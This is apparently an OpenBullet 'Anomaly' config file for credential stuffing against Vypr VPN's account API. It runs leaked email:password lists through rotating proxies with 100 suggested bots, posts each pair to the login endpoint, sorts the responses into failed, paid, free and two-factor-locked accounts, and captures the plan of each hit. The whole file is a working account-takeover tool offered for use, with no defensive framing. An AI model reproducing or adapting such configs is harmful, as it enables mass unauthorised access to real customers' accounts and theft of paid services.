[SETTINGS]
{
  "Name": "Vypr VPN",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-09-04T16:20:48.0709487+04:30",
  "AdditionalInfo": "",
  "Author": "",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Post REQUEST GET "https://api.goldenfrog.com/settings" 
  
  HEADER "User-Agent: okhttp/3.12.1" 
  HEADER "username: <USER>" 
  HEADER "password: <PASS>" 

#Key_Check KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "invalid username or password" 
  KEYCHAIN Success OR 
    KEY "\"confirmed\": true," 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"vpn\": null" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "\"locked\"" 

#Plan PARSE "<SOURCE>" JSON "account_level_display" CreateEmpty=FALSE -> CAP "Plan" 

#Account_Type PARSE "<SOURCE>" JSON "account_level" CreateEmpty=FALSE -> CAP "Account Type" 

